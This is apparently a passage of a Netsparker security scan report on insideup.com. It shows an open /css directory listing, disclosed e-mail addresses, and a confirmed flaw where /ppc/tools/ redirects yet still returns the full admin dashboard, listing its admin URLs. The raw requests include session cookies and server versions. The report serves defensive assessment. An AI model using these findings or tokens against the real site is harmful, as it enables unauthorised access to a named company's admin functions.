<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html> <head> <title>Index of /css</title> </head> <body><h1>Index of /css</h1><table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr><tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right"> - </td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="Copy%20of%20mainInsidUp.css">Copy of mainInsidUp.css</a></td><td align="right">12-Apr-2011 09:32 </td><td align="right"> 56K</td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="Dyn_form_style.css">Dyn_form_style.css</a></td><td align="right">12-Apr-2011 09:32 </td><td align="right">1.6K</td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="calendar.css">calendar.css</a></td><td align="right">12-Apr-2011 09:31 </td><td align="right">2.3K</td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="dhtmlwindow.css">dhtmlwindow.css</a></td><td align="right">12-Apr-2011 09:32 </td><td align="right">1.1K</td></tr><tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="fb/">fb/</a></td><td align="right">18-Apr-2011 13:34 </td><td align="right"> - </td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="grid.css">grid.css</a></td><td align="right">12-Apr-2011 09:31 </td><td align="right">945 </td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="jquery.collapsedtree.css">jquery.collapsedtree.css</a></td><td align="right">12-Apr-2011 09:32 </td><td align="right">390 </td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a 
href="jquery.expandedtree.css">jquery.expandedtree.css</a></td><td align="right">12-Apr-2011 09:31 </td><td align="right">378 </td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="mainInsidUp.css">mainInsidUp.css</a></td><td align="right">12-Apr-2011 09:32 </td><td align="right">125K</td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="mainNewInsideup.css">mainNewInsideup.css</a></td><td align="right">12-Apr-2011 09:31 </td><td align="right"> 40K</td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="newlanding_style.css">newlanding_style.css</a></td><td align="right">12-Apr-2011 09:32 </td><td align="right">2.4K</td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="newstyle.css">newstyle.css</a></td><td align="right">12-Apr-2011 09:31 </td><td align="right"> 18K</td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="reset.css">reset.css</a></td><td align="right">12-Apr-2011 09:31 </td><td align="right">648 </td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="style.css">style.css</a></td><td align="right">12-Apr-2011 09:31 </td><td align="right"> 31K</td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="styleWiki.css">styleWiki.css</a></td><td align="right">12-Apr-2011 09:31 </td><td align="right">5.7K</td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="styles.css">styles.css</a></td><td align="right">12-Apr-2011 09:31 </td><td align="right">2.1K</td></tr><tr><th colspan="5"><hr></th></tr></table><address>Apache/2.2.9 (Fedora) Server at www.insideup.com Port 443</address></body></html>
E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam e-mail engines and brute force tools. Furthermore, valid e-mail addresses may lead to social engineering attacks.

Remedy

Use generic e-mail addresses such as contact@ or info@ for general communications and remove user-specific e-mail addresses from the web site; where contact with specific people is required, use submission forms for this purpose.

External References

- /privacy.html

/privacy.html

http://www.insideup.com/privacy.html

Found E-mails

  • privacy@insideup.com
  • support@insideup.com

Request

GET /privacy.html HTTP/1.1
Referer: http://www.insideup.com/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=F53C9933FE14A39B648D7D0BA68B6BA5
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:15:15 GMT
Server: Apache/2.2.9 (Fedora)
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


</p> <div id="privacyHeading" class="quesRtSubTxt">Questions</div> <p> If you have any questions about this privacy statement, our online practices, or your dealings with our websites, you can contact us at: </p> <div> InsideUp.<br /> 8895 Town Center Drive, Suite 105<br /> San Diego, CA 92122 USA<br /> e-mail: <a href="mailto:privacy@insideup.com">privacy (at) insideup.com </a> </div><br /> <div id="privacyHeading" class="quesRtSubTxt">Personal Information</div> <div><b>What Type of Personal Information Do We Collect and Use?</b></div> <p> If you contact us by email, complete our registration forms, surveys, or entry forms, register for our community services, subscribe to our newsletters, or participate in one of our contests or sweepstakes, we will ask you for certain information. The information we ask for may include the following: </p> <p> <ul> <div id="privacyUlLi"> <li>Your Name</li> <li>Your Email Address</li> <li>Your Age</li> <li>Company Name</li> <li>Company Address</li> <li>Company Telephone Number</li> <li>Company Mailing Address</li> <li>Company Zip Code</li> <li>Company Email Address</li> <li>Company Webs..
Redirect Response BODY Is Too Large

1 TOTAL (INFORMATION), 1 CONFIRMED
Netsparker identified that the response from the page returned an HTTP redirect status but carried more body content than usual. This generally indicates that, after issuing the redirect, the page did not terminate the response as it should have, so a client that ignores the Location header still receives that body.

Impact

This can lead to serious issues such as authentication bypass on pages that require authentication; on other pages it generally indicates a programming error.

Remedy

Finish the HTTP Response after you redirect the user.

In ASP.NET, use Response.Redirect("redirected-page.aspx", true); instead of Response.Redirect("redirected-page.aspx", false);. In PHP applications, call exit(); after you redirect the user.
- /ppc/tools/

/ppc/tools/ CONFIRMED

http://www.insideup.com/ppc/tools/

Request

GET /ppc/tools/ HTTP/1.1
Referer: http://www.insideup.com/ppc/tools/images/newlanding_insideuplogo.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=F53C9933FE14A39B648D7D0BA68B6BA5; OAID=98176d5cda925cc255264f2e6b81597a; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2228%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A51%3A%22http%3A%2F%2Fwww.insideup.com%2Fcompetitivecomparision.html%22%3B%7D; PHPSESSID=bevcehsdjrij0b7vbkc95loq47; OAVARS[ad01cc48]=DEFAULT; sessionID=0b2d5f8e1658958c3530cfa0d175799a
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Wed, 20 Apr 2011 02:17:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
location: /admin/adminhome.html?accessdenied=true
Content-Length: 7578
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>InsideUp Admin Tool</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <link href="css/default.css" rel="stylesheet" type="text/css" /> <link href="css/mainnewnnsideup.css" rel="stylesheet" type="text/css" /> <script type="text/javascript" src="js/jquery-1.js"></script> <script type="text/javascript" src="js/default.js"></script></head><body><table border="0" cellspacing='0' cellpadding='1' align='center' width="100%" class="maintable"> <tr> <td colspan="2" valign="top" height="490"> <div id="wrapper"> <div id="header"> <div id="logo"> <img src="images/insideup-logo.jpg" alt="InsidUp" /><br /> Business Management System </div> <div id="headerRight"> <div id="loginLogot"> Welcom <a href="/admin/logout.html">[Logout]</a> <a href="/admin/adminhome.html">[Admin Home]</a> </div> <div id="topmenu"> <div class="header"> <ul id="headerNav" class="headerNav headerContentActive"> <li class="headerHome"> <a href="http://www.insideup.com/admin/adminusers.html" onmouseover="toggleHeader(0,'headerHomeActive')" onmouseout="toggleHeader(1,'headerContentActive')">---------</a> </li> <li class="headerAdvertise"> <a href="http://www.insideup.com/admin/showAdvertiser.html" onmouseover="toggleHeader(0, 'headerAdvertiseActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerAffiliate"> <a href="http://www.insideup.com/admin/partners.html" onmouseover="toggleHeader(0,'headerAffiliateActive')" onmouseout="toggleHeader(1,'headerContentActive')">---------</a> </li> <li class="headerCategory"> <a href="http://www.insideup.com/admin/showSubCategoryDetail.html" onmouseover="toggleHeader(0, 'headerCategoryActive')" onmouseout="toggleHeader(1,'headerContentActive')">---------</a> </li> <li class="headerContent"> <a 
href="http://www.insideup.com/ppc/tools/index.php" onmouseover="toggleHeader(0, 'headerContentActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerCredit"> <a href="http://www.insideup.com/admin/showRefund.html" onmouseover="toggleHeader(0, 'headerCreditActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerDirectry"> <a href="http://www.insideup.com/admin/showYahooData.html" onmouseover="toggleHeader(0, 'headerDirectryActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerFunding"> <a href="http://www.insideup.com/admin/showFundDetail.html" onmouseover="toggleHeader(0, 'headerFundingActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerLeads"> <a href="http://www.insideup.com/admin/showLead.html?index=5&subCategoryId=-1&optionId=-1&attributeId=-1" onmouseover="toggleHeader(0, 'headerLeadsActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerOrders"> <a href="http://www.insideup.com/admin/leadOrders.html?viewType=orders" onmouseover="toggleHeader(0, 'headerOrdersActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerPartners"> <a href="http://www.insideup.com/admin/showAffilates.html" onmouseover="toggleHeader(0, 'headerPartnersActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerRefund"> <a href="http://www.insideup.com/admin/refundrequest.html" onmouseover="toggleHeader(0, 'headerRefundActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerReports"> <a href="http://www.insideup.com/admin/reports.html" onmouseover="toggleHeader(0, 'headerReportsActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerReps"> <a 
href="http://www.insideup.com/admin/showSalesRepresentative.html" onmouseover="toggleHeader(0, 'headerRepsActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerTools"> <a href="http://www.insideup.com/admin/adminUpload.html" onmouseover="toggleHeader(0, 'headerToolsActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> <li class="headerUsers"> <a href="http://www.insideup.com/admin/serviceseekers.html" onmouseover="toggleHeader(0, 'headerUsersActive')" onmouseout="toggleHeader(1, 'headerContentActive')">---------</a> </li> </ul> </div> </div> </div> </div> <div id="contentWrapper"> <div class="ContentTopMenu"> <a href="template_index.php">Templates</a> | <a href="pages_index.php">Lead Flow</a> | <a href="select_vendor_index.php">Select Vendor</a> </div> <!-- Content Section Start --> <div id="contentBox"> <img src="images/contenttop.jpg" alt="" style="display:block;" /> <!--Text content start here--> <div id="contentMatter"> <table cellspacing="0" cellpadding="5" border="0" width="100%" class="mainTable"> <tbody> <tr> <td align="left" width="39%" valign="middle" class="lineTwo">Total Group</td> <td align="right" width="61%" valign="middle" class="lineTwo">946</td> </tr> <tr> <td align="left" valign="middle" class="lineOne">Total Templates</td> <td align="right" valign="middle" class="lineOne">5</td> </tr> <tr> <td align="left" valign="middle" class="lineTwo">Total Categories</td> <td align="right" valign="middle" class="lineTwo">68</td> </tr> <tr> <td align="left" valign="middle" class="lineOne">Two Page Lead Flows</td> <td align="right" valign="middle" class="lineOne">0</td> </tr> <tr> <td align="left" valign="middle" class="lineTwo">One Page Lead Flows</td> <td align="right" valign="middle" class="lineTwo">0</td> </tr> <tr> <td align="left" valign="middle" class="lineOne">Dynamic Lead Flows</td> <td align="right" valign="middle" class="lineOne">959</td> </tr> <tr> <td align="left" 
valign="middle" class="lineTwo">Video Lead Flows</td> <td align="right" valign="middle" class="lineTwo">6</td> </tr> <tr> <td align="left" valign="middle" class="lineTwo">Mobile Lead Flows</td> <td align="right" valign="middle" class="lineTwo">6</td> </tr> <tr> <td align="left" valign="middle" class="lineOne">Select Vendor</td> <td align="right" valign="middle" class="lineOne">8</td> </tr> </tbody> </table> </div> <!--Text content start here--> <img src="images/contentbottam.jpg" alt="" style="display:block;" /> </div> </div> </td> </tr> <tr> <td colspan="2" align="center">Copyright 2011 InsideUp, Inc. All Rights Reserved.</td> </tr> </table></body></html>